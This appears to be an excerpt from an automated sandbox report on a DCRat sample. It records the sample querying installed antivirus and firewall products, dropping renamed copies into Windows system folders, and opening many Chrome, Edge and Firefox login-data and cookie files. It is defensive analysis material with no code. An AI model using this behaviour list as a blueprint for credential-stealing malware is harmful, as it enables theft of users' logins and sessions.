Source: C:\Users\user\Desktop\QMT2731i8k.exe	Queries volume information: C:\Users\user\Desktop\QMT2731i8k.exe VolumeInformation
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Recovery\qioiNOJzhriMVnsRuLz.exe VolumeInformation
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe VolumeInformation
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Queries volume information: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe VolumeInformation
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Queries volume information: C:\Users\user\Desktop\QMT2731i8k.exe VolumeInformation

Source: C:\Users\user\Desktop\QMT2731i8k.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4132994646.000000001B120000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 0.2.QMT2731i8k.exe.2480000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QMT2731i8k.exe.2480000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4109389958.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1680583848.000000001266D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4109389958.0000000002B52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1677712641.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QMT2731i8k.exe PID: 7504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qioiNOJzhriMVnsRuLz.exe PID: 7852, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
